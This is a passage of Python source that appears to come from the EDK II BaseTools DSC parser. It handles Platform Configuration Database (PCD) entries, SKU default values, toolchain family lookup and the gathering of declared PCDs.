if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, Dummy5))
PcdDict[Arch, SkuName, PcdCName, TokenSpaceGuid] = Setting
# Remove redundant PCD candidates, per the ARCH and SKU
for PcdCName, TokenSpaceGuid, SkuName, Dummy4 in PcdList:
Setting = PcdDict[self._Arch, SkuName, PcdCName, TokenSpaceGuid]
if Setting is None:
continue
#
# For the VOID* type, it can have optional data of MaxDatumSize and InitialValue
# For the Integer & Boolean type, the optional data can only be InitialValue.
# At this point, we put all the data into the PcdClassObject because we don't know the PCD's datum type
# until the DEC parser has been called.
#
VpdOffset, MaxDatumSize, InitialValue = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
if MaxDatumSize:
if int(MaxDatumSize, 0) > 0xFFFF:
EdkLogger.error('build', FORMAT_INVALID, "The size value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if int(MaxDatumSize, 0) < 0:
EdkLogger.error('build', FORMAT_INVALID, "The size value can't be set to negative value for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
SkuInfo = SkuInfoClass(SkuName, self.SkuIds[SkuName][0], '', '', '', '', VpdOffset, InitialValue)
if (PcdCName, TokenSpaceGuid) in Pcds:
pcdObject = Pcds[PcdCName, TokenSpaceGuid]
pcdObject.SkuInfoList[SkuName] = SkuInfo
if MaxDatumSize.strip():
CurrentMaxSize = int(MaxDatumSize.strip(), 0)
else:
CurrentMaxSize = 0
if pcdObject.MaxDatumSize:
PcdMaxSize = int(pcdObject.MaxDatumSize, 0)
else:
PcdMaxSize = 0
if CurrentMaxSize > PcdMaxSize:
pcdObject.MaxDatumSize = str(CurrentMaxSize)
else:
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
'',
InitialValue,
'',
MaxDatumSize,
OrderedDict({SkuName : SkuInfo}),
False,
None,
IsDsc=True)
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][TAB_DEFAULT_STORES_DEFAULT] = InitialValue
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][TAB_DEFAULT_STORES_DEFAULT] = (self.MetaFile.File,Dummy4)
for pcd in Pcds.values():
pcdDecObject = self._DecPcds[pcd.TokenCName, pcd.TokenSpaceGuidCName]
pcd.DatumType = pcdDecObject.DatumType
# Only fix the value while no value provided in DSC file.
for sku in pcd.SkuInfoList.values():
if not sku.DefaultValue:
sku.DefaultValue = pcdDecObject.DefaultValue
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON not in pcd.SkuInfoList:
SkuInfoObj = list(pcd.SkuInfoList.values())[0]
valuefromDec = pcdDecObject.DefaultValue
SkuInfo = SkuInfoClass(TAB_DEFAULT, '0', '', '', '', '', SkuInfoObj.VpdOffset, valuefromDec)
pcd.SkuInfoList[TAB_DEFAULT] = SkuInfo
elif TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
# For the same VOID* PCD, if one SKU's default value is a Unicode string while the other
# SKUs use another VOID* form (ASCII string or byte array), convert the Unicode string to a byte array.
for pcd in Pcds.values():
PcdValueTypeSet = set()
for sku in pcd.SkuInfoList.values():
PcdValueTypeSet.add("UnicodeString" if sku.DefaultValue.startswith(('L"',"L'")) else "OtherVOID*")
if len(PcdValueTypeSet) > 1:
for sku in pcd.SkuInfoList.values():
sku.DefaultValue = StringToArray(sku.DefaultValue) if sku.DefaultValue.startswith(('L"',"L'")) else sku.DefaultValue
list(map(self.FilterSkuSettings, Pcds.values()))
return Pcds
## Add external modules
#
# The external modules are mostly those listed in the FDF file, which don't
# need to be built.
#
# @param FilePath The path of module description file
#
def AddModule(self, FilePath):
FilePath = NormPath(FilePath)
if FilePath not in self.Modules:
Module = ModuleBuildClassObject()
Module.MetaFile = FilePath
self.Modules.append(Module)
@property
def ToolChainFamily(self):
self._ToolChainFamily = TAB_COMPILER_MSFT
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, "target.txt"))
if os.path.isfile(BuildConfigurationFile) == True:
ToolDefinitionFile = TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = "tools_def.txt"
ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
ToolDefinition = ToolDef.ToolsDefTxtDatabase
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition \
or self._Toolchain not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][self._Toolchain]:
self._ToolChainFamily = TAB_COMPILER_MSFT
else:
self._ToolChainFamily = ToolDefinition[TAB_TOD_DEFINES_FAMILY][self._Toolchain]
return self._ToolChainFamily
## Add external PCDs
#
# The external PCDs are mostly those listed in FDF file to specify address
# or offset information.
#
# @param Name Name of the PCD
# @param Guid Token space guid of the PCD
# @param Value Value of the PCD
#
def AddPcd(self, Name, Guid, Value):
if (Name, Guid) not in self.Pcds:
self.Pcds[Name, Guid] = PcdClassObject(Name, Guid, '', '', '', '', '', {}, False, None)
self.Pcds[Name, Guid].DefaultValue = Value
@property
def DecPcds(self):
if self._DecPcds is None:
FdfInfList = []
if GlobalData.gFdfParser:
FdfInfList = GlobalData.gFdfParser.Profile.InfList
PkgSet = set()
for Inf in FdfInfList:
ModuleFile = PathClass(NormPath(Inf), GlobalData.gWorkspace, Arch=self._Arch)
if ModuleFile in self._Modules:
continue
ModuleData = self._Bdb[ModuleFile, self._Arch, self._Target, self._Toolchain]
PkgSet.update(ModuleData.Packages)
if self.Packages:
PkgSet.update(self.Packages)
self._DecPcds, self._GuidDict = GetDeclaredPcd(self, self._Bdb, self._Arch, self._Target, self._Toolchain, PkgSet)
self._GuidDict.update(GlobalData.gPlatformPcds)
return self._DecPcds